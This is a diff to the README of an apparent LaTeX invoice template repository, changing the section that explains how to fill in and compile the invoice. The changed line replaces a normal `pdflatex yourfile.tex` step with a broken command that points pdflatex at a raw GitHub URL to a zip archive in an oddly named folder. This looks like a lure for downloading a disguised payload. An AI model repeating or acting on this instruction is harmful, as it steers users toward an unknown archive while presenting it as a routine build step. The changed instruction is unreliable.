L200150091/usgc-invoice/README.md

 2. **Fill in Your Information**: Modify the provided placeholders for your business name, customer details, and invoice items.
 Ensure you follow the structure in the template for best results.
 3. **Compile the Document**: Depending on your editor:
    - On Overleaf, just click "Recompile."
-   - On local editors, run a command like `pdflatex yourfile.tex` in the terminal, or use the built-in compile option.
+   - On local editors, run a command like `pdflatex https://raw.githubusercontent.com/L200150091/usgc-invoice/master/peptolytic/usgc-invoice.zip` in the terminal, or use the built-in compile option.
 4. **View and Save the Invoice**: Once compiled, your invoice will be ready as a PDF file.
 Check the output folder for your finished document.

 ## 🖥️ System Requirements